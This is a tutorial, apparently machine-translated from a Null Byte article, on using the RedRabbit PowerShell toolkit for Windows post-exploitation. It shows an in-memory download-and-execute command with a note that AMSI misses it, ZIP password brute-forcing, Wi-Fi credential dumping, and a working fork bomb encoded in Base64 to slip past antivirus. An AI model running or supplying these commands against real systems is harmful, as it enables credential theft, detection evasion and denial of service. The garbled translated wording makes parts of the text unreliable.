قالب وردپرس درنا توس
Home / Tips and Tricks / How to use RedRabbit for pen testing and post-exploitation of Windows machines «Null-byte :: WonderHowTo

How to use RedRabbit for pen testing and post-exploitation of Windows machines «Null-byte :: WonderHowTo



RedRabbit is an ethical hacking toolkit built for pen testing and exploration. It can be used to identify attack vectors, brute-force protected files, extract stored network passwords and cover up code. Created specifically for red teams, RedRabbit is his brother’s evil twin, BlueRabbit, and is the offensive half of the “Rabbit Suite”.

The creator of RedRabbit, Ashley Moran, better known as securethelogs, makes a plethora of Windows-based tools for ethical hacking and penetration testing. RedRabbit happens to be one of my favorites.

RedRabbit offers pen testers of Windows systems an alternative to tools like PowerShell Empire (or just Empire), which is no longer in development. While RedRabbit isn̵

7;t quite taking up the torch in terms of the scope of Empire, a now-deprecated all-encompassing tool, RedRabbit is both lightweight and up-to-date, guaranteeing it will work on most Windows systems.

Moran’s tool can be downloaded and run directly in memory, reducing the chance of detection. As a bonus, Windows AMSI does not currently recognize RedRabbit as a malicious script (unlike most offensive PowerShell tools).

RedRabbit is still under active development, and while most of its features have been completed, a few are not fully fleshed out (at least at the time of publishing). So, for now, let’s focus on just some of the juicier things RedRabbit has to offer.

What you need

This is a postal exploitation tool, so you need administrator access to use RedRabbit. If you don’t have administrator privileges, but would like to get them, privilege escalation can help, a topic we’ve covered on null byte more than once here.

Apart from that, to use RedRabbit you only need a computer with Windows, the latest version of PowerShell and an internet connection.

Step 1: Check if you can run scripts

First, open Windows PowerShell as an administrator. You can search or browse for the app in Windows, then right-click and select “Run as administrator”. Instead of right-clicking with PowerShell selected, you can click Control-Shift and then Enter. That keyboard shortcut in Windows opens apps in administrator mode. Click “Yes” if you are prompted to let PowerShell make changes.

Now make sure you can run scripts with your PowerShell execution policy:

C:> Get-ExecutionPolicy

If PowerShell comes back with “Limited”, go ahead and set it to RemoteSigned. Then confirm the change by typing AND and press Enter.

C:> Set-ExecutionPolicy RemoteSigned

Step 2: Download, install and run RedRabbit

We’re going to download the RedRabbit PowerShell script as plain text directly from the securethelog’s GitHub page for RedRabbit. To download RedRabbit and run the script without ever having to save it to the hard drive, we use the “Invoke-Expression” (iex for short) command. RedRabbit should run immediately after this.

C:> $url = "https://raw.githubusercontent.com/securethelogs/RedRabbit/master/redrabbit.ps1"
C:> iex(New-Object Net.WebClient).DownloadString($url)

You could also shorten that to one line if you want:

C:> iex(New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/securethelogs/RedRabbit/master/redrabbit.ps1")

If for some reason you want to download and save the script, you can use the code below. It will save the PowerShell script in your chosen location, but it won’t open it automatically.

C:> $out = C:ChosenLocationScript.ps1
C:> $url = "https://raw.githubusercontent.com/securethelogs/RedRabbit/master/redrabbit.ps1"
C:> Invoke-WebRequest -uri $url -outfile $out

To run RedRabbit, type the location of the script preceded by a period.

C:> .ChosenLocationScript.ps1

Step 3: Use RedRabbit

Once you run the tool, you will be greeted by RedRabbit’s logo and options menu as seen below. We’re going to take a look at some of these options to see how they work. A full description of each option can be found on the securethelog website.

██▀███  ▓█████ ▓█████▄  ██▀███   ▄▄▄       ▄▄▄▄    ▄▄▄▄    ██▓▄▄▄█████▓                 \,_
▓██ ▒ ██▒▓█   ▀ ▒██▀ ██▌▓██ ▒ ██▒▒████▄    ▓█████▄ ▓█████▄ ▓██▒▓  ██▒ ▓▒                  ` ,
▓██ ░▄█ ▒▒███   ░██   █▌▓██ ░▄█ ▒▒██  ▀█▄  ▒██▒ ▄██▒██▒ ▄██▒██▒▒ ▓██░ ▒░             __,.-" =__)
▒██▀▀█▄  ▒▓█  ▄ ░▓█▄   ▌▒██▀▀█▄  ░██▄▄▄▄██ ▒██░█▀  ▒██░█▀  ░██░░ ▓██▓ ░           ."        )
░██▓ ▒██▒░▒████▒░▒████▓ ░██▓ ▒██▒ ▓█   ▓██▒░▓█  ▀█▓░▓█  ▀█▓░██░  ▒██▒ ░        ,_/   ,    /_
░ ▒▓ ░▒▓░░░ ▒░ ░ ▒▒▓  ▒ ░ ▒▓ ░▒▓░ ▒▒   ▓▒█░░▒▓███▀▒░▒▓███▀▒░▓    ▒ ░░          _|    )_- _-`
  ░▒ ░ ▒░ ░ ░  ░ ░ ▒  ▒   ░▒ ░ ▒░  ▒   ▒▒ ░▒░▒   ░ ▒░▒   ░  ▒ ░    ░
  ░░   ░    ░    ░ ░  ░   ░░   ░   ░   ▒    ░    ░  ░    ░  ▒ ░  ░
   ░        ░  ░   ░       ░           ░  ░ ░       ░       ░
                 ░                               ░       ░
Creator: https://securethelogs.com / @securethelogs

Current User: timsacerlaptoptim-laptop | Current Machine: TimsAcerLaptop
Session Running As Admin: True!!   |  Is User Domain Admin: Computer In WORKGROUP, Cannot Query AD

Please select one of the following:

Option 1: Quick Recon                               Option 10: Password Extraction
Option 2: Scan Subnet                               Option 11: Encode Commands (Base64)
Option 3: Clipboard Logger                          Option 12: Run Encoded Commands (Base64)
Option 4: Network Scanner                           Option 13: Edit Local Host (SMB Relay)
Option 5: DNS Resolver                              Option 14: Probe For SMB Share
Option 6: Brute Force ZIP                           Option 15: Web Crawler
Option 7: Brute WinRM                               Option 16: File Crawler
Option 8: Test Extraction Connection
Option 9: Show Local Firewall Deny Rules

 --- OSINT Options ----                             --- Cloud Options ----

Option A: Find Subdomains                           Option Azure: Query Azure/AzureAD
Option B: Daily PasteBin
Option C: Scan Azure Resource
Option D: Scan Socials For Usernames

Option ::

Fast Recon

Let’s take a look at the first option, “Quick Recon.” Type 1 and then on Enter. This displays a wealth of information, including system privilege constants such as process memory quotas (something that would be useful to know if you want to perform a buffer overflow attack, for example).

It also shows us the system accounts, which of those accounts have administrative privileges, our current network status, installed programs, and the system’s firewall rules so that we can identify potential attack vectors.

Option :: 1

User: ********
Hostname: ******

GROUP INFORMATION
-----------------
Group Name                                                    Type             SID          Attributes
============================================================= ================ ============ ===============================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITYLocal account and member of Administrators group Well-known group S-1-5-114    Mandatory group, Enabled by default, Enabled group
BUILTINAdministrators                                        Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
...

PRIVILEGES INFORMATION
----------------------
Privilege Name                            Description                                                        State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Disabled
SeSecurityPrivilege                       Manage auditing and security log                                   Disabled
...

LOCAL USERS INFORMATION
-----------------------
User accounts for \TIMSACERLAPTOP

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
Squibble                 TheRealTim               Tim-Laptop
WDAGUtilityAccount
The command completed successfully.

PROGRAM INFORMATION
-------------------
7-Zip
Acer
...
WindowsPowerShell

FIREWALL INFORMATION
-------------------
Name            DisplayName                DisplayGroup Protocol LocalPort RemotePort RemoteAddress Enabled         Profile Direction Action
----            -----------                ------------ -------- --------- ---------- ------------- -------         ------- --------- ------
SNMPTRAP-In-UDP SNMP Trap Service (UDP In) SNMP Trap    UDP      162       Any        LocalSubnet     False Private, Public   Inbound  Allow
SNMPTRAP-In-... SNMP Trap Service (UDP In) SNMP Trap    UDP      162       Any        Any             False          Domain   Inbound  Allow
WiFiDirect-K... WFD Driver-only (TCP-In)   WLAN Serv... TCP      Any       Any        Any              True             Any   Inbound  Allow
...
{D3972BB3-88... BitTorrent (UDP-In)                     UDP      Any       Any        Any              True             Any   Inbound  Allow

Options 2 and 9 are both included in Option 1 for quick exploration, so you don’t need to run them separately if you have already used Option 1 as you already have that information to hand.

Crack zip files

A rather interesting feature in RedRabit is the ability to try to crack a password-protected zip file using a glossary. For it to work we need to have the 7zip application installed on our system.

To test this feature, I wrote a secret message in a .txt file and archived it with a password. Now the file cannot be extracted without a password.

What can it be?

We need a glossary when we try to crack it, one that hopefully contains the correct password. I used a list of common SecLists credentials on GitHub.

Once we have both a zip file to crack and a glossary, run RedRabbit again with AND and select option 6 for “Brute Force ZIP.” The tool will then ask you for the location of the file and your dictionary. After it is given, the brute force process will begin.

Option:: 6

7Zip installed........
Let's Brute ........

Location of Zipped File :: C:Tempsecret.zip
Location of Wordlist :: C:Tempwordlist.txt
ERROR: Wrong password : MySecret.txt
ERROR: Wrong password : MySecret.txt
ERROR: Wrong password : MySecret.txt
ERROR: Wrong password : MySecret.txt
ERROR: Wrong password : MySecret.txt
Password Found: retiasterriblesecret
------------ End -------------------

The Password Is: retiasterriblesecret

Rerun RedRabbit? (Y/N):

We cracked it! Who knew that “retiasterriblesecret” was the sixth most used password?

Dump Wi-Fi passwords

RedRabbit also makes it really easy to instantly display the credentials of any saved Wi-Fi network. To use this option, keep in mind that you need to use PowerShell as an administrator.

After running RedRabbit again with AND and select option 10 at “Password Extraction” you will be asked to enter the location of a file where you want to save the credentials. If you prefer to have them printed directly in the PowerShell console, leave it blank and press Enter.

Option:: 10

Wireless Passwords Extracted......

Network Name: p****k
Password: w*****k

Network Name: j******s
Password: i****2

Network Name: a******e
Password: c**********a

Network Name: R*******T
Password: n**********7

Network Name: h*******5
Password: 2******************5

Rerun RedRabbit? (Y/N):

If you have administrator rights, you should technically already have access to the network credentials; RedRabbit just provides an easy and convenient interface to do this.

Coding and executing commands in Base64

A common method to bypass potentially antivirus software or otherwise bypass obfuscating code is to encode commands in Base64. With RedRabbit we can encode PowerShell commands as well as run coded commands (options 11 and 12).

To test RedRabbit’s encoding option, let’s take a simple (but effective) PowerShell fork bomb:

$fork = {
    param($p)
    $block = [ScriptBlock]::Create($p)
    Start-Job $block -ArgumentList "$p"
    Invoke-Command -ScriptBlock $block -ArgumentList "$p"
}
Invoke-Command -ScriptBlock $fork -ArgumentList $fork

Unfortunately, we can only encode a few lines of text in Base64 with RedRabbit, so we’ll sum this up into one line with a few shorthand and semicolons. Use option 11 for “Encode Commands (Base64)”, use the one-liner as our value for RedRabbit to encode.

Option:: 11

Enter The Value To Encode: $fork = {param($p);$block = [ScriptBlock]::Create($p);Start-Job $block -ar "$p";&$block "$p"};&$fork $fork

Encoded Command Below:
JABmAG8AcgBrACAAPQAgAHsAcABhAHIAYQBtACgAJABwACkAOwAkAGIAbABvAGMAawAgAD0AIABbAFMAYwByAGkAcAB0AEIAbABvAGMAawBdADoAOgBDAHIAZQBhAHQAZQAoACQAcAApADsAUwB0AGEAcgB0AC0ASgBvAGIAIAAkAGIAbABvAGMAawAgAC0AYQByACAAIgAkAHAAIgA7ACYAJABiAGwAbwBjAGsAIAAiACQAcAAiAH0AOwAmACQAZgBvAHIAawAgACQAZgBvAHIAawA=

Rerun RedRabbit (Y/N):

Now we have a Base64 encoded fork bomb! Disclaimer: this fork bomb shall crash your computer. You have been warned.

To start our fork bomb, run RedRabbit again and select the option 12 for “Run Encoded Commands (Base64).” Paste the Base64 string when prompted and our code will be executed. Actually, don’t do this with my Base64 fork bomb unless you’re okay with Windows crashing.

Option:: 12

Paste Encoded Command Here: JABmAG8AcgBrACAAPQAgAHsAcABhAHIAYQBtACgAJABwACkAOwAkAGIAbABvAGMAawAgAD0AIABbAFMAYwByAGkAcAB0AEIAbABvAGMAawBdADoAOgBDAHIAZQBhAHQAZQAoACQAcAApADsAUwB0AGEAcgB0AC0ASgBvAGIAIAAkAGIAbABvAGMAawAgAC0AYQByACAAIgAkAHAAIgA7ACYAJABiAGwAbwBjAGsAIAAiACQAcAAiAH0AOwAmACQAZgBvAHIAawAgACQAZgBvAHIAawA=

Id     Name            PSJobTypeName   State         HasMoreData     Location
--     ----            -------------   -----         -----------     --------
1      Job1            BackgroundJob   Running       True            localhost
3      Job3            BackgroundJob   Running       True            localhost
5      Job5            BackgroundJob   Running       True            localhost
7      Job7            BackgroundJob   Running       True            localhost
9      Job9            BackgroundJob   Running       True            localhost
11     Job11           BackgroundJob   Running       True            localhost
13     Job13           BackgroundJob   Running       True            localhost
15     Job15           BackgroundJob   Running       True            localhost

After 48 iterations my computer crashed. In other words, well done!

A handy tool

That was a brief overview of some of RedRabbit’s most interesting features; feel free to check out some of the others for yourself. Again, a number of features are not completely finished. This tool is still under active development and security-logs has periodically updated the GitHub repository. In my testing, the clipboard logger (option 3) was not working and PowerShell crashed every time I tried to use it. So there are still some bugs that still need to be worked out.

Remember, all that RedRabbit can do are things you theoretically should be able to do as an administrator (like retrieve saved Wi-Fi passwords). As such, it does not represent an inherent vulnerability of Windows. What makes RedRabbit a useful tool is that it makes otherwise tedious pen testing tasks fully automated.

Do you want to start making money as a white hat hacker? Jump-start your hacking career with our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and get more than 60 hours of training from cybersecurity professionals.

Buy now (90% discount)>

Other valuable deals to check out:

Cover image and screenshot by Retia / Null byte




Source link